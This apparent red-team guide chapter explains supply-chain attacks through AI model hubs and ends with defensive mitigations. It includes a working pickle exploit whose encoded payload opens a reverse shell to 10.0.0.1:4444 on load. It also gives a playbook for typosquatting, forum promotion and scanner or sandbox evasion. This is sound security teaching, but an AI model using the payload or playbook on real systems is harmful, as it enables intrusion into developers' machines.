Model marketplaces like Hugging Face Hub, TensorFlow Hub, and others have become the de facto package managers for the AI world. They accelerate development at an unprecedented scale, but this convenience introduces a vast and often overlooked attack surface. By treating these hubs as implicitly trusted sources, organizations expose themselves to a range of supply chain attacks that mirror threats long seen in traditional software dependencies, but with unique AI-specific twists.
Your role as a red teamer is to challenge this implicit trust. You must demonstrate that the act of downloading a pre-trained model is as critical a security checkpoint as installing a third-party library. The threats are not theoretical; they are practical and actively exploited.
The Marketplace as a Delivery Mechanism
An adversary views a model marketplace not as a library of tools, but as a distribution platform for malware. The goal is to get a malicious payload onto a target system, and a popular-looking model is an excellent Trojan horse. These attacks exploit the entire ecosystem surrounding the model, from its code to its documentation.
The core threats can be categorized into several distinct types:
Key Threat Categories in Model Marketplaces
- Arbitrary Code Execution via Serialization: The most severe threat. Many models are saved using formats like Python’s
pickle, which can be weaponized to execute arbitrary code on the machine that loads the model. - Model-Based Denial of Service (DoS): A model crafted to consume exorbitant amounts of RAM, VRAM, or CPU upon loading or during inference, effectively crippling the host system. This is a resource exhaustion attack.
- Backdoor Poisoning: As discussed in Chapter 10.1.1, a model can be poisoned with a hidden backdoor. The marketplace is the primary vector for distributing these compromised models to unsuspecting victims.
- Social Engineering and Impersonation: Using deceptive names (typosquatting), falsified performance metrics, and malicious instructions in model cards to trick developers into downloading the wrong or a malicious model.
Attack Vector: Weaponizing Model Serialization
The danger of unsafe deserialization is a well-known vulnerability in general software security, but it takes on special significance in MLOps. The pickle format in Python, while convenient for saving complex objects like ML models, is notoriously insecure because it can be instructed to run arbitrary code during the unpickling process. An attacker can craft a malicious model file that, when loaded, executes a payload.
Consider this example where an attacker defines a custom class with a malicious __reduce__ method. This method is called during unpickling and allows the attacker to specify a function to be called and its arguments.
import pickle
import os
import base64
# Attacker's payload: A simple reverse shell command (base64 encoded)
# Corresponds to: os.system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"')
PAYLOAD = b'b3Muc3lzdGVtKCdiYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjAuMC4xLzQ0NDQgMD4mMSInKQ=='
class MaliciousModel:
def __init__(self):
# A seemingly normal model attribute
self.weights = [1.0, 2.0, 3.0]
def __reduce__(self):
# This is the malicious part. It gets called during unpickling.
# It tells pickle to call 'eval' with the decoded payload.
return (eval, (base64.b64decode(PAYLOAD),))
# Attacker creates an instance of the malicious object
malicious_object = MaliciousModel()
# Attacker saves it to a file, e.g., 'malicious_model.pkl'
with open('malicious_model.pkl', 'wb') as f:
pickle.dump(malicious_object, f)
# --- Victim's machine ---
# A developer downloads 'malicious_model.pkl' and tries to load it
# with open('malicious_model.pkl', 'rb') as f:
# loaded_model = pickle.load(f) # The payload executes here!
When the victim runs pickle.load(), the reverse shell command is executed, giving the attacker access to their system. This is why formats like SafeTensors are gaining popularity—they are designed specifically to prevent this type of arbitrary code execution by storing only the tensor data without executable code.
Red Team Engagement: Simulating a Marketplace Attack
Your objective in a red team exercise is to test the organization’s resilience to a compromised model from a public or internal marketplace. The goal is not just to gain execution, but to assess the entire detection and response pipeline.
Figure 1: The model marketplace as a vector for payload delivery.
Operational Playbook
- Reconnaissance: Identify the types of models and frameworks used by the target organization. Are they using PyTorch, TensorFlow? What specific tasks are they working on (e.g., NLP, computer vision)? This helps in crafting a believable malicious model.
- Payload Development: Create a benign-looking model that performs a plausible task. Embed a non-destructive payload, such as a beacon that performs a DNS lookup or an HTTP request to a server you control upon loading. This confirms execution without causing damage. Use the serialization technique shown above.
- Camouflage and Distribution: Upload the model to a public marketplace. Use typosquatting (e.g., `roberta-base-finetuned` instead of `roberta-base`) or create a new model with an appealing name and a well-written model card. If the organization has an internal marketplace, gaining access to it becomes the primary objective.
- Social Engineering: Subtly promote the model. Mention it in relevant Discord servers, forums, or Stack Overflow questions where developers from the target organization might be active.
- Monitor and Report: Monitor for callbacks from your payload. A successful execution indicates a critical failure in the organization’s model vetting and security controls. Your report should detail the path of compromise, the lack of sandboxing, and the failure to inspect the model source.
Defensive Strategies and Mitigation
Defending against marketplace threats requires a multi-layered approach that combines technical controls with developer education. You cannot simply block access to public hubs, as this would cripple development.
| Strategy | Description | Red Team Consideration |
|---|---|---|
| Internal Model Registry | Maintain a private, curated registry of approved models. Models from public sources are scanned, vetted, and signed before being made available to internal developers. | The registry itself becomes a high-value target. Can you compromise the vetting process or the registry infrastructure? |
| Mandatory Security Scanning | Integrate tools like `piklescan` or other static/dynamic scanners into the CI/CD pipeline to automatically check any new model dependency for known malicious patterns or code execution risks. | Test the efficacy of these scanners. Can you create a payload that evades their detection logic? |
| Use Safe Serialization Formats | Enforce the use of “safe” formats like SafeTensors, which are designed to store only tensor data and prevent arbitrary code execution by design. | Are there ways to trick developers into using an unsafe loader even for a safe format? Social engineering in documentation is a key vector. |
| Sandboxed Execution | Load and test all new models in a heavily restricted and monitored sandbox environment (e.g., a container with no network access) before promoting them to development or production. | Can your payload detect a sandbox environment and delay execution? Can it find a way to break out of the container? |
| Provenance Verification | Train developers to verify the source of a model. Is it from a reputable organization like Google or Meta, or from an unknown user with no history? Check for digital signatures if the platform supports them. | How easy is it to impersonate a reputable source? Test the developers’ skepticism with a well-crafted fake repository. |
Ultimately, the most effective defense is a security-aware culture. When developers understand that a .pkl or .pt file can be as dangerous as an unknown executable, they become the first and most important line of defense against these supply chain attacks.